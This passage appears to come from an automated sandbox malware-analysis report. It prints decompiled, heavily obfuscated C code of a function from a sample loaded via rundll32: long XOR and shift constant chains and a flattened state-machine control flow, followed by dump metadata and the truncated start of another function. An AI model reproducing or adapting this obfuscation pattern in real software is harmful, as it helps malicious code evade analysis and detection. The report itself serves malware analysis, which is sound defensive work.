				_v192 = _v192 ^ 0x0df05af0;
				_v308 = 0x42c709;
				_v308 = _v308 | 0x3400f9ef;
				_v308 = _v308 << 3;
				_v308 = _v308 + 0x3df1;
				_v308 = _v308 ^ 0xa2183d69;
				_v152 = 0x5369e0;
				_v152 = _v152 ^ 0xff6c3c62;
				_v152 = _v152 ^ 0xff3f5582;
				_v276 = 0x14bd80;
				_v276 = _v276 << 5;
				_v276 = _v276 ^ 0x5f90d5fe;
				_v276 = _v276 / _t732;
				_v276 = _v276 ^ 0x00de92e5;
				_v164 = 0xc6025f;
				_t733 = 0x77;
				_v164 = _v164 / _t733;
				_v164 = _v164 ^ 0x0001a9f8;
				_v196 = 0xc87c9f;
				_v196 = _v196 + 0x15df;
				_v196 = _v196 ^ 0x00c8927e;
				_v316 = 0xe66987;
				_v316 = _v316 ^ 0x1b2582a6;
				_t734 = 0x3b;
				_v316 = _v316 * 0x5b;
				_v316 = _v316 + 0x2fb1;
				_v316 = _v316 ^ 0xdea4c46c;
				_v224 = 0xfe0ac2;
				_v224 = _v224 + 0xfffff1ae;
				_v224 = _v224 ^ 0x9ea75b7a;
				_v224 = _v224 ^ 0x9e5aa70a;
				_v272 = 0x969b46;
				_v272 = _v272 / _t734;
				_t735 = 0x5e;
				_v272 = _v272 / _t735;
				_v272 = _v272 ^ 0xefd30b8f;
				_v272 = _v272 ^ 0xefd30d7c;
				_v376 = 0x150d1;
				_v376 = _v376 + 0xf180;
				_v376 = _v376 ^ 0x94f4a204;
				_v376 = _v376 + 0xffff1e44;
				_v376 = _v376 ^ 0x94f362d9;
				_v156 = 0xee57c3;
				_v156 = _v156 >> 1;
				_v156 = _v156 ^ 0x00740491;
				_v212 = 0xc602fd;
				_v212 = _v212 + 0x6a76;
				_v212 = _v212 + 0x1c99;
				_v212 = _v212 ^ 0x00ce641d;
				_v268 = 0xce4877;
				_v268 = _v268 ^ 0x1d22fca4;
				_v268 = _v268 | 0x3421cf88;
				_v268 = _v268 ^ 0x3de53c3b;
				_v124 = 0x747c03;
				_v124 = _v124 + 0xffffbae7;
				_v124 = _v124 ^ 0x007459dd;
				_v236 = 0x1c09ef;
				_t736 = 0x7d;
				_v236 = _v236 * 0x24;
				_v236 = _v236 >> 5;
				_v236 = _v236 ^ 0x00154586;
				_v248 = 0xce2f;
				_v248 = _v248 / _t736;
				_v248 = _v248 ^ 0x54fb24c5;
				_v248 = _v248 ^ 0x54f69380;
				_v368 = 0xa2f216;
				_v368 = _v368 ^ 0x77671628;
				_v368 = _v368 + 0xffffb776;
				_t737 = 0x12;
				_v368 = _v368 * 0x54;
				_v368 = _v368 ^ 0x4cdde93a;
				_v256 = 0x7ecaf1;
				_v256 = _v256 + 0xffff3fac;
				_v256 = _v256 >> 1;
				_v256 = _v256 ^ 0x003aef01;
				_v352 = 0xabf876;
				_v352 = _v352 >> 0xb;
				_v352 = _v352 + 0xffff46d6;
				_v352 = _v352 + 0x2c0c;
				_v352 = _v352 ^ 0xfff246b3;
				_v360 = 0x97ba77;
				_v360 = _v360 ^ 0x3e0377f3;
				_v360 = _v360 >> 0xd;
				_v360 = _v360 / _t737;
				_v360 = _v360 ^ 0x00060934;
				_v336 = 0x8ce7a6;
				_t738 = 0x2f;
				_v336 = _v336 / _t738;
				_v336 = _v336 + 0xffff2624;
				_v336 = _v336 | 0x278756f7;
				_v336 = _v336 ^ 0x278bbfdd;
				_v344 = 0xbf551b;
				_v344 = _v344 * 0x3a;
				_v344 = _v344 ^ 0x84c4554b;
				_v344 = _v344 << 0xf;
				_v344 = _v344 ^ 0x8ea60236;
				_v200 = 0x4381fe;
				_v200 = _v200 | 0xd1728d79;
				_v200 = _v200 ^ 0xd172d7b5;
				_v304 = 0x80f198;
				_t739 = 0x31;
				_v304 = _v304 * 0x64;
				_v304 = _v304 << 0xe;
				_v304 = _v304 + 0xffff9e99;
				_v304 = _v304 ^ 0x97d19a3f;
				_v312 = 0x373eb5;
				_v312 = _v312 / _t739;
				_v312 = _v312 >> 9;
				_v312 = _v312 ^ 0x9e5751db;
				_v312 = _v312 ^ 0x9e5d4ba0;
				_v188 = 0xb51e1e;
				_t740 = 0x6d;
				_v188 = _v188 * 0x30;
				_v188 = _v188 ^ 0x21f969de;
				_v128 = 0x6dafe5;
				_v128 = _v128 + 0xdb72;
				_v128 = _v128 ^ 0x00632f59;
				_v348 = 0xf775fc;
				_v348 = _v348 * 0x7b;
				_v348 = _v348 | 0xe77e6c6c;
				_v348 = _v348 + 0xffff92b3;
				_v348 = _v348 ^ 0xf7fd41f8;
				_v292 = 0x49707d;
				_v292 = _v292 + 0xffffa330;
				_v292 = _v292 + 0x378d;
				_v292 = _v292 ^ 0x2a616ae7;
				_v292 = _v292 ^ 0x2a2200cf;
				_v148 = 0xe2ca7f;
				_v148 = _v148 + 0x2800;
				_v148 = _v148 ^ 0x00ec4a73;
				_v180 = 0x28ed65;
				_t276 =  &_v180; // 0x28ed65
				_v180 =  *_t276 / _t740;
                                                                                                                          				_v180 = _v180 ^ 0x0008a356;
                                                                                                                          				_v340 = 0xb04f06;
                                                                                                                          				_v340 = _v340 | 0x19ae51aa;
                                                                                                                          				_v340 = _v340 + 0xffff0ab2;
                                                                                                                          				_v340 = _v340 >> 7;
                                                                                                                          				_v340 = _v340 ^ 0x003d7bf7;
                                                                                                                          				_v252 = 0x779412;
                                                                                                                          				_t741 = 0x28;
                                                                                                                          				_v252 = _v252 / _t741;
                                                                                                                          				_v252 = _v252 | 0x065d8c29;
                                                                                                                          				_v252 = _v252 ^ 0x0653787d;
                                                                                                                          				_v140 = 0x2cf99d;
                                                                                                                          				_v140 = _v140 << 0xf;
                                                                                                                          				_v140 = _v140 ^ 0x7ccdbf9f;
                                                                                                                          				_v300 = 0xa5c7e2;
                                                                                                                          				_v300 = _v300 ^ 0xf64f2b87;
                                                                                                                          				_v300 = _v300 | 0xd6032566;
                                                                                                                          				_v300 = _v300 << 7;
                                                                                                                          				_v300 = _v300 ^ 0x75f4cdbc;
                                                                                                                          				_v204 = 0xc71fe4;
                                                                                                                          				_v204 = _v204 ^ 0x39f608ad;
                                                                                                                          				_v204 = _v204 ^ 0x39346367;
                                                                                                                          				_v332 = 0x26340b;
                                                                                                                          				_t742 = 0xc;
                                                                                                                          				_v332 = _v332 / _t742;
                                                                                                                          				_v332 = _v332 >> 0xc;
                                                                                                                          				_v332 = _v332 + 0x4006;
                                                                                                                          				_v332 = _v332 ^ 0x00056ca9;
                                                                                                                          				_v244 = 0xb4bdd0;
                                                                                                                          				_v244 = _v244 ^ 0x9dcc8204;
                                                                                                                          				_t743 = 0x5c;
                                                                                                                          				_v244 = _v244 * 0x56;
                                                                                                                          				_v244 = _v244 ^ 0xe668140d;
                                                                                                                          				_v228 = 0xb7abf;
                                                                                                                          				_v228 = _v228 ^ 0x8d46dccd;
                                                                                                                          				_v228 = _v228 / _t743;
                                                                                                                          				_v228 = _v228 ^ 0x0183fb21;
                                                                                                                          				_v132 = 0x744574;
                                                                                                                          				_t744 = 0x2d;
                                                                                                                          				_v132 = _v132 * 0x27;
                                                                                                                          				_v132 = _v132 ^ 0x11b9ba9e;
                                                                                                                          				_v384 = 0x4471dc;
                                                                                                                          				_v384 = _v384 ^ 0x8273491f;
                                                                                                                          				_v384 = _v384 / _t744;
                                                                                                                          				_v384 = _v384 + 0xffffe0da;
                                                                                                                          				_v384 = _v384 ^ 0x02e26e3a;
                                                                                                                          				_v324 = 0x605f40;
                                                                                                                          				_v324 = _v324 + 0xffffce94;
                                                                                                                          				_v324 = _v324 + 0xffff95c1;
                                                                                                                          				_v324 = _v324 >> 6;
                                                                                                                          				_v324 = _v324 ^ 0x0001f278;
                                                                                                                          				_v380 = 0xfa4dc1;
                                                                                                                          				_t745 = 0x17;
                                                                                                                          				_v380 = _v380 * 0x71;
                                                                                                                          				_v380 = _v380 ^ 0x12ce666f;
                                                                                                                          				_v380 = _v380 | 0xc76ff931;
                                                                                                                          				_v380 = _v380 ^ 0xfff34e85;
                                                                                                                          				_v172 = 0xf73d33;
                                                                                                                          				_v172 = _v172 >> 7;
                                                                                                                          				_v172 = _v172 ^ 0x0001a374;
                                                                                                                          				_v364 = 0xb38f71;
                                                                                                                          				_v364 = _v364 + 0x4143;
                                                                                                                          				_v364 = _v364 ^ 0x53c53aac;
                                                                                                                          				_v364 = _v364 / _t745;
                                                                                                                          				_v364 = _v364 ^ 0x03acc109;
                                                                                                                          				_v260 = 0xa91f99;
                                                                                                                          				_v260 = _v260 >> 0xa;
                                                                                                                          				_v260 = _v260 ^ 0xc9224c65;
                                                                                                                          				_v260 = _v260 ^ 0xc926367a;
                                                                                                                          				_v284 = 0x5ea8fe;
                                                                                                                          				_v284 = _v284 * 0x3e;
                                                                                                                          				_v284 = _v284 | 0x757fbe3f;
                                                                                                                          				_v284 = _v284 ^ 0x77fedad5;
                                                                                                                          				_v264 = 0xc1651a;
                                                                                                                          				_v264 = _v264 / _t745;
                                                                                                                          				_v264 = _v264 + 0x650c;
                                                                                                                          				_v264 = _v264 ^ 0x00066731;
                                                                                                                          				_v372 = 0xd53751;
                                                                                                                          				_v372 = _v372 >> 0x10;
                                                                                                                          				_v372 = _v372 * 0x50;
                                                                                                                          				_v372 = _v372 ^ 0xc5a53504;
                                                                                                                          				_v372 = _v372 ^ 0xc5a85656;
                                                                                                                          				_v220 = 0x28743;
                                                                                                                          				_v220 = _v220 | 0x747e4fe0;
                                                                                                                          				_v220 = _v220 >> 8;
                                                                                                                          				_v220 = _v220 ^ 0x0078aec3;
                                                                                                                          				_v356 = 0x673303;
                                                                                                                          				_v356 = _v356 + 0xffff3afb;
                                                                                                                          				_v356 = _v356 >> 2;
                                                                                                                          				_t746 = 0x76;
                                                                                                                          				_t842 = 0x6cd454e;
                                                                                                                          				_v96 = 0x100;
                                                                                                                          				_t840 = 0xcf5796f;
                                                                                                                          				_v356 = _v356 * 9;
                                                                                                                          				_v356 = _v356 ^ 0x00e12344;
                                                                                                                          				_v232 = 0xe5489f;
                                                                                                                          				_v232 = _v232 * 0x62;
                                                                                                                          				_v232 = _v232 ^ 0x422e6763;
                                                                                                                          				_v232 = _v232 ^ 0x15e3beef;
                                                                                                                          				_v144 = 0x9d1c0d;
                                                                                                                          				_v144 = _v144 | 0x5a9db401;
                                                                                                                          				_v144 = _v144 ^ 0x5a9ceaa6;
                                                                                                                          				_v328 = 0xaba5b0;
                                                                                                                          				_v328 = _v328 + 0xfc55;
                                                                                                                          				_v328 = _v328 * 0x37;
                                                                                                                          				_v328 = _v328 * 0x78;
                                                                                                                          				_v328 = _v328 ^ 0x62b938e2;
                                                                                                                          				_v168 = 0x51360e;
                                                                                                                          				_v168 = _v168 << 2;
                                                                                                                          				_v168 = _v168 ^ 0x014a45e2;
                                                                                                                          				_v176 = 0x11fbeb;
                                                                                                                          				_v176 = _v176 << 0xa;
                                                                                                                          				_v176 = _v176 ^ 0x47e89d0f;
                                                                                                                          				_v216 = 0x8fcc87;
                                                                                                                          				_v216 = _v216 / _t746;
                                                                                                                          				_v216 = _v216 ^ 0xd2cd5e41;
                                                                                                                          				_v216 = _v216 ^ 0xd2c9cc36;
                                                                                                                          				_v184 = 0x8a666a;
                                                                                                                          				_v184 = _v184 * 0x6c;
                                                                                                                          				_v184 = _v184 ^ 0x3a66624b;
                                                                                                                          				_v288 = 0x12fc4d;
                                                                                                                          				_v288 = _v288 ^ 0x84b68421;
                                                                                                                          				_v288 = _v288 * 0x77;
                                                                                                                          				_v288 = _v288 ^ 0xa87aad10;
                                                                                                                          				_v296 = 0xb3f337;
                                                                                                                          				_v296 = _v296 >> 1;
                                                                                                                          				_v296 = _v296 + 0xffffa2d0;
                                                                                                                          				_v296 = _v296 + 0xffff98aa;
                                                                                                                          				_v296 = _v296 ^ 0x0050e375;
                                                                                                                          				_v160 = 0xa98b94;
                                                                                                                          				_v160 = _v160 ^ 0x93f8baf3;
                                                                                                                          				_v160 = _v160 ^ 0x935506dc;
                                                                                                                          				_v208 = 0xd26eef;
                                                                                                                          				_v208 = _v208 + 0xffff657d;
                                                                                                                          				_v208 = _v208 << 5;
                                                                                                                          				_v208 = _v208 ^ 0x1a3ecca6;
                                                                                                                          				_v280 = 0xce1cc4;
                                                                                                                          				_v280 = _v280 << 6;
                                                                                                                          				_v280 = _v280 << 0x10;
                                                                                                                          				_v280 = _v280 | 0xb3a7eb9b;
                                                                                                                          				_v280 = _v280 ^ 0xb3a418cd;
                                                                                                                          				while(1) {
                                                                                                                          					L1:
                                                                                                                          					_t747 = 0xb34e23f;
                                                                                                                          					while(1) {
                                                                                                                          						L2:
                                                                                                                          						while(1) {
                                                                                                                          							L3:
                                                                                                                          							_t690 = 0xa0b11f8;
                                                                                                                          							do {
                                                                                                                          								while(1) {
                                                                                                                          									L4:
                                                                                                                          									_t850 = _t725 - _t690;
                                                                                                                          									if(_t850 > 0) {
                                                                                                                          										break;
                                                                                                                          									}
                                                                                                                          									if(_t850 == 0) {
                                                                                                                          										_t700 = E007A4624(_v224, _v108, _v232, _v144,  &_v112, _v328, _v120);
                                                                                                                          										_t847 = _t847 + 0x14;
                                                                                                                          										__eflags = _t700;
                                                                                                                          										_t747 = 0xb34e23f;
                                                                                                                          										_t725 =  ==  ? 0xb34e23f : 0xcc5fcc9;
                                                                                                                          										goto L2;
                                                                                                                          									} else {
                                                                                                                          										if(_t725 == 0x24fa5ba) {
                                                                                                                          											_push(_v212);
                                                                                                                          											_push(_v156);
                                                                                                                          											_t701 = E007ADCF7(_v376, 0x791984, __eflags);
                                                                                                                          											_push(_v236);
                                                                                                                          											_push(_v124);
                                                                                                                          											_t704 = E00799462(_t701, _v368,  &_v116, E007ADCF7(_v268, 0x791814, __eflags), _v256, _v136);
                                                                                                                          											_t847 = _t847 + 0x24;
                                                                                                                          											__eflags = _t704 - _v240;
                                                                                                                          											_t725 =  ==  ? 0xec78b05 : 0xc75135f;
                                                                                                                          											E0079A8B0(_v352, _t701, _v360);
                                                                                                                          											E0079A8B0(_v336, _t702, _v344);
                                                                                                                          											_t840 = 0xcf5796f;
                                                                                                                          											goto L13;
                                                                                                                          										} else {
                                                                                                                          											if(_t725 == 0x505fe8e) {
                                                                                                                          												_t631 =  &_v208; // 0x39346367
                                                                                                                          												E0079957D(_v116, _v160,  *_t631, _v272, _v280);
                                                                                                                          											} else {
                                                                                                                          												if(_t725 == _t842) {
                                                                                                                          													_push(_v340);
                                                                                                                          													_push(_v180);
                                                                                                                          													_t710 = E007ADCF7(_v148, 0x791854, __eflags);
                                                                                                                          													_pop(_t763);
                                                                                                                          													_t844 = _t710;
                                                                                                                          													_t711 = 0x48;
                                                                                                                          													_v104 = _t711;
                                                                                                                          													_t713 = E00791C45(_v120,  &_v104,  &_v76, _v252, _v140, _v300, _v204, _t710, _v332, _v276, _t763, _t711);
                                                                                                                          													_t847 = _t847 + 0x28;
                                                                                                                          													__eflags = _t713 - _v164;
                                                                                                                          													if(_t713 != _v164) {
                                                                                                                          														_t725 = _t840;
                                                                                                                          													} else {
                                                                                                                          														_t834 =  *0x7b3dfc; // 0x0
                                                                                                                          														E0079ED7E(_v244, _t834, _v228,  &_v68, 0x40);
                                                                                                                          														_t847 = _t847 + 0xc;
                                                                                                                          														_t725 = 0x9bcfe4f;
                                                                                                                          													}
                                                                                                                          													E0079A8B0(_v132, _t844, _v384);
                                                                                                                          													goto L13;
                                                                                                                          												} else {
                                                                                                                          													if(_t725 == 0x7252bf3) {
                                                                                                                          														_t725 = 0x24fa5ba;
                                                                                                                          														continue;
                                                                                                                          													} else {
                                                                                                                          														if(_t725 == _t819) {
                                                                                                                          															_t717 = E0079B144(_v120, _v188, _v308, _v128, _v348, _v292);
                                                                                                                          															_t847 = _t847 + 0x10;
                                                                                                                          															__eflags = _t717 - _v152;
                                                                                                                          															_t725 =  ==  ? _t842 : _t840;
                                                                                                                          															while(1) {
                                                                                                                          																L1:
                                                                                                                          																_t747 = 0xb34e23f;
                                                                                                                          																L2:
                                                                                                                          																L3:
                                                                                                                          																_t690 = 0xa0b11f8;
                                                                                                                          																goto L4;
                                                                                                                          															}
                                                                                                                          														} else {
                                                                                                                          															_t856 = _t725 - 0x9bcfe4f;
                                                                                                                          															if(_t725 == 0x9bcfe4f) {
                                                                                                                          																_push(_v172);
                                                                                                                          																_push(_v380);
                                                                                                                          																_t719 = E007ADCF7(_v324, 0x791854, _t856);
                                                                                                                          																_pop(_t772);
                                                                                                                          																E0079AA4D(_v364, _t719,  *((intOrPtr*)(_v100 + 4)), _v284, _v196, _v116,  &_v108, _v264, _t772,  *_v100, _v372);
                                                                                                                          																_t725 =  ==  ? 0xa0b11f8 : _t840;
                                                                                                                          																E0079A8B0(_v220, _t719, _v356);
                                                                                                                          																_t847 = _t847 + 0x2c;
                                                                                                                          																L13:
                                                                                                                          																_t842 = 0x6cd454e;
                                                                                                                          																L32:
                                                                                                                          																_t819 = 0x9b01f0f;
                                                                                                                          																_t747 = 0xb34e23f;
                                                                                                                          																_t690 = 0xa0b11f8;
                                                                                                                          															}
                                                                                                                          															goto L33;
                                                                                                                          														}
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          									L36:
                                                                                                                          									return _t846;
                                                                                                                          								}
                                                                                                                          								__eflags = _t725 - _t747;
                                                                                                                          								if(_t725 == _t747) {
                                                                                                                          									_t691 = E00792BD9(_v112);
                                                                                                                          									_t725 = 0xb500bcf;
                                                                                                                          									__eflags = _t691;
                                                                                                                          									_t846 =  !=  ? 1 : _t846;
                                                                                                                          									goto L32;
                                                                                                                          								} else {
                                                                                                                          									__eflags = _t725 - 0xb500bcf;
                                                                                                                          									if(_t725 == 0xb500bcf) {
                                                                                                                          										E007ACA69(_v112, _v168, _v176);
                                                                                                                          										_t725 = 0xcc5fcc9;
                                                                                                                          										goto L1;
                                                                                                                          									} else {
                                                                                                                          										__eflags = _t725 - 0xcc5fcc9;
                                                                                                                          										if(_t725 == 0xcc5fcc9) {
                                                                                                                          											E0079A958(_v216, _v108, _v184);
                                                                                                                          											_t725 = _t840;
                                                                                                                          											while(1) {
                                                                                                                          												L1:
                                                                                                                          												_t747 = 0xb34e23f;
                                                                                                                          												goto L2;
                                                                                                                          											}
                                                                                                                          										} else {
                                                                                                                          											__eflags = _t725 - _t840;
                                                                                                                          											if(_t725 == _t840) {
                                                                                                                          												E0079A958(_v288, _v120, _v296);
                                                                                                                          												_t725 = 0x505fe8e;
                                                                                                                          												while(1) {
                                                                                                                          													L1:
                                                                                                                          													_t747 = 0xb34e23f;
                                                                                                                          													goto L2;
                                                                                                                          												}
                                                                                                                          											} else {
                                                                                                                          												__eflags = _t725 - 0xec78b05;
                                                                                                                          												if(__eflags != 0) {
                                                                                                                          													goto L33;
                                                                                                                          												} else {
                                                                                                                          													_v104 = _v96;
                                                                                                                          													_t697 = E007992C7(_v200, _v96, _v304, _v312,  &_v120, _v116, _v320);
                                                                                                                          													_t847 = _t847 + 0x14;
                                                                                                                          													__eflags = _t697 - _v192;
                                                                                                                          													_t819 = 0x9b01f0f;
                                                                                                                          													_t747 = 0xb34e23f;
                                                                                                                          													_t725 =  ==  ? 0x9b01f0f : 0x505fe8e;
                                                                                                                          													goto L3;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								goto L36;
                                                                                                                          								L33:
                                                                                                                          							} while (_t725 != 0xc75135f);
                                                                                                                          							goto L36;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}

                                                                                                                          0x0079c044
                                                                                                                          0x0079c04c
                                                                                                                          0x0079c05f
                                                                                                                          0x0079c062
                                                                                                                          0x0079c069
                                                                                                                          0x0079c074
                                                                                                                          0x0079c07f
                                                                                                                          0x0079c08a
                                                                                                                          0x0079c095
                                                                                                                          0x0079c0a2
                                                                                                                          0x0079c0a6
                                                                                                                          0x0079c0ae
                                                                                                                          0x0079c0b6
                                                                                                                          0x0079c0be
                                                                                                                          0x0079c0c6
                                                                                                                          0x0079c0ce
                                                                                                                          0x0079c0d6
                                                                                                                          0x0079c0de
                                                                                                                          0x0079c0e6
                                                                                                                          0x0079c0f1
                                                                                                                          0x0079c0fc
                                                                                                                          0x0079c107
                                                                                                                          0x0079c112
                                                                                                                          0x0079c11d
                                                                                                                          0x0079c124
                                                                                                                          0x0079c12f
                                                                                                                          0x0079c137
                                                                                                                          0x0079c13f
                                                                                                                          0x0079c147
                                                                                                                          0x0079c14c
                                                                                                                          0x0079c154
                                                                                                                          0x0079c166
                                                                                                                          0x0079c16b
                                                                                                                          0x0079c174
                                                                                                                          0x0079c17f
                                                                                                                          0x0079c18a
                                                                                                                          0x0079c195
                                                                                                                          0x0079c19d
                                                                                                                          0x0079c1a8
                                                                                                                          0x0079c1b0
                                                                                                                          0x0079c1b8
                                                                                                                          0x0079c1c0
                                                                                                                          0x0079c1c5
                                                                                                                          0x0079c1cd
                                                                                                                          0x0079c1d8
                                                                                                                          0x0079c1e3
                                                                                                                          0x0079c1ee
                                                                                                                          0x0079c1fa
                                                                                                                          0x0079c1fd
                                                                                                                          0x0079c201
                                                                                                                          0x0079c206
                                                                                                                          0x0079c20e
                                                                                                                          0x0079c216
                                                                                                                          0x0079c223
                                                                                                                          0x0079c238
                                                                                                                          0x0079c23b
                                                                                                                          0x0079c242
                                                                                                                          0x0079c24d
                                                                                                                          0x0079c258
                                                                                                                          0x0079c26e
                                                                                                                          0x0079c275
                                                                                                                          0x0079c280
                                                                                                                          0x0079c293
                                                                                                                          0x0079c296
                                                                                                                          0x0079c29d
                                                                                                                          0x0079c2a8
                                                                                                                          0x0079c2b0
                                                                                                                          0x0079c2c0
                                                                                                                          0x0079c2c4
                                                                                                                          0x0079c2cc
                                                                                                                          0x0079c2d4
                                                                                                                          0x0079c2dc
                                                                                                                          0x0079c2e4
                                                                                                                          0x0079c2ec
                                                                                                                          0x0079c2f1
                                                                                                                          0x0079c2f9
                                                                                                                          0x0079c306
                                                                                                                          0x0079c307
                                                                                                                          0x0079c30b
                                                                                                                          0x0079c313
                                                                                                                          0x0079c31b
                                                                                                                          0x0079c323
                                                                                                                          0x0079c32e
                                                                                                                          0x0079c336
                                                                                                                          0x0079c341
                                                                                                                          0x0079c349
                                                                                                                          0x0079c351
                                                                                                                          0x0079c361
                                                                                                                          0x0079c365
                                                                                                                          0x0079c36d
                                                                                                                          0x0079c378
                                                                                                                          0x0079c380
                                                                                                                          0x0079c38b
                                                                                                                          0x0079c396
                                                                                                                          0x0079c3a3
                                                                                                                          0x0079c3a7
                                                                                                                          0x0079c3af
                                                                                                                          0x0079c3b7
                                                                                                                          0x0079c3cb
                                                                                                                          0x0079c3d2
                                                                                                                          0x0079c3dd
                                                                                                                          0x0079c3e8
                                                                                                                          0x0079c3f0
                                                                                                                          0x0079c3fa
                                                                                                                          0x0079c3fe
                                                                                                                          0x0079c406
                                                                                                                          0x0079c40e
                                                                                                                          0x0079c419
                                                                                                                          0x0079c424
                                                                                                                          0x0079c42c
                                                                                                                          0x0079c437
                                                                                                                          0x0079c43f
                                                                                                                          0x0079c447
                                                                                                                          0x0079c455
                                                                                                                          0x0079c456
                                                                                                                          0x0079c45b
                                                                                                                          0x0079c466
                                                                                                                          0x0079c46b
                                                                                                                          0x0079c46f
                                                                                                                          0x0079c477
                                                                                                                          0x0079c48a
                                                                                                                          0x0079c491
                                                                                                                          0x0079c49c
                                                                                                                          0x0079c4a7
                                                                                                                          0x0079c4b2
                                                                                                                          0x0079c4bd
                                                                                                                          0x0079c4c8
                                                                                                                          0x0079c4d0
                                                                                                                          0x0079c4dd
                                                                                                                          0x0079c4e6
                                                                                                                          0x0079c4ea
                                                                                                                          0x0079c4f2
                                                                                                                          0x0079c4fd
                                                                                                                          0x0079c505
                                                                                                                          0x0079c510
                                                                                                                          0x0079c51b
                                                                                                                          0x0079c523
                                                                                                                          0x0079c52e
                                                                                                                          0x0079c542
                                                                                                                          0x0079c549
                                                                                                                          0x0079c554
                                                                                                                          0x0079c55f
                                                                                                                          0x0079c572
                                                                                                                          0x0079c579
                                                                                                                          0x0079c584
                                                                                                                          0x0079c594
                                                                                                                          0x0079c5a1
                                                                                                                          0x0079c5a5
                                                                                                                          0x0079c5ad
                                                                                                                          0x0079c5b5
                                                                                                                          0x0079c5b9
                                                                                                                          0x0079c5c1
                                                                                                                          0x0079c5c9
                                                                                                                          0x0079c5d1
                                                                                                                          0x0079c5dc
                                                                                                                          0x0079c5e7
                                                                                                                          0x0079c5f2
                                                                                                                          0x0079c5fd
                                                                                                                          0x0079c608
                                                                                                                          0x0079c610
                                                                                                                          0x0079c61b
                                                                                                                          0x0079c623
                                                                                                                          0x0079c628
                                                                                                                          0x0079c62d
                                                                                                                          0x0079c635
                                                                                                                          0x0079c63d
                                                                                                                          0x0079c63d
                                                                                                                          0x0079c63d
                                                                                                                          0x0079c642
                                                                                                                          0x0079c642
                                                                                                                          0x0079c647
                                                                                                                          0x0079c647
                                                                                                                          0x0079c647
                                                                                                                          0x0079c64c
                                                                                                                          0x0079c64c
                                                                                                                          0x0079c64c
                                                                                                                          0x0079c64c
                                                                                                                          0x0079c64e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079c654
                                                                                                                          0x0079c917
                                                                                                                          0x0079c91c
                                                                                                                          0x0079c924
                                                                                                                          0x0079c926
                                                                                                                          0x0079c92b
                                                                                                                          0x00000000
                                                                                                                          0x0079c65a
                                                                                                                          0x0079c660
                                                                                                                          0x0079c83b
                                                                                                                          0x0079c847
                                                                                                                          0x0079c852
                                                                                                                          0x0079c857
                                                                                                                          0x0079c865
                                                                                                                          0x0079c89e
                                                                                                                          0x0079c8a5
                                                                                                                          0x0079c8b4
                                                                                                                          0x0079c8c5
                                                                                                                          0x0079c8c8
                                                                                                                          0x0079c8d8
                                                                                                                          0x0079c8de
                                                                                                                          0x00000000
                                                                                                                          0x0079c666
                                                                                                                          0x0079c66c
                                                                                                                          0x0079ca66
                                                                                                                          0x0079ca7b
                                                                                                                          0x0079c672
                                                                                                                          0x0079c674
                                                                                                                          0x0079c779

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ;<=$@_`$CA$D#$Kbf:$PB5$Y/c$cg.B$e($gc49$ll~$sJ$tEt$uP$vj$O~t$iS$ja*
                                                                                                                          • API String ID: 0-258179307
                                                                                                                          • Opcode ID: a8732ae385b22025627bcf52e5f6f534e042fbc463a480e96cf918d630764c11
                                                                                                                          • Instruction ID: dcc1f17940c3d4199c0e51f2254cc3bb2f2393af1d8e5d93afd6f76a240d0685
                                                                                                                          • Opcode Fuzzy Hash: a8732ae385b22025627bcf52e5f6f534e042fbc463a480e96cf918d630764c11
                                                                                                                          • Instruction Fuzzy Hash: E1720FB1509381DFD779CF25D58AA9BBBE2BBC4304F10891DE6CA86260D7B58949CF03
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E007A4B87(void* __ecx) {
                                                                                                                          				char _v524;
                                                                                                                          				char _v1044;
                                                                                                                          				char _v1564;
                                                                                                                          				char _v2084;
                                                                                                                          				char _v2604;
                                                                                                                          				signed int _v2608;
                                                                                                                          				intOrPtr _v2612;
                                                                                                                          				intOrPtr _v2616;
                                                                                                                          				intOrPtr _v2620;
                                                                                                                          				intOrPtr _v2624;
                                                                                                                          				char _v2628;
                                                                                                                          				intOrPtr _v2632;
                                                                                                                          				char _v2636;
                                                                                                                          				signed int _v2640;
                                                                                                                          				signed int _v2644;
                                                                                                                          				signed int _v2648;
                                                                                                                          				signed int _v2652;
                                                                                                                          				signed int _v2656;
                                                                                                                          				signed int _v2660;
                                                                                                                          				signed int _v2664;
                                                                                                                          				signed int _v2668;
                                                                                                                          				signed int _v2672;
                                                                                                                          				signed int _v2676;
                                                                                                                          				signed int _v2680;
                                                                                                                          				signed int _v2684;
                                                                                                                          				signed int _v2688;
                                                                                                                          				signed int _v2692;
                                                                                                                          				signed int _v2696;
                                                                                                                          				signed int _v2700;
                                                                                                                          				signed int _v2704;
                                                                                                                          				signed int _v2708;
                                                                                                                          				signed int _v2712;
                                                                                                                          				signed int _v2716;
                                                                                                                          				signed int _v2720;
                                                                                                                          				signed int _v2724;
                                                                                                                          				signed int _v2728;
                                                                                                                          				signed int _v2732;
                                                                                                                          				signed int _v2736;
                                                                                                                          				signed int _v2740;
                                                                                                                          				signed int _v2744;
                                                                                                                          				signed int _v2748;
                                                                                                                          				signed int _v2752;
                                                                                                                          				signed int _v2756;
                                                                                                                          				signed int _v2760;
                                                                                                                          				signed int _v2764;
                                                                                                                          				signed int _v2768;
                                                                                                                          				signed int _v2772;
                                                                                                                          				signed int _v2776;
                                                                                                                          				signed int _v2780;
                                                                                                                          				signed int _v2784;
                                                                                                                          				signed int _v2788;
                                                                                                                          				signed int _v2792;
                                                                                                                          				signed int _v2796;
                                                                                                                          				signed int _v2800;
                                                                                                                          				signed int _v2804;
                                                                                                                          				signed int _v2808;
                                                                                                                          				signed int _v2812;
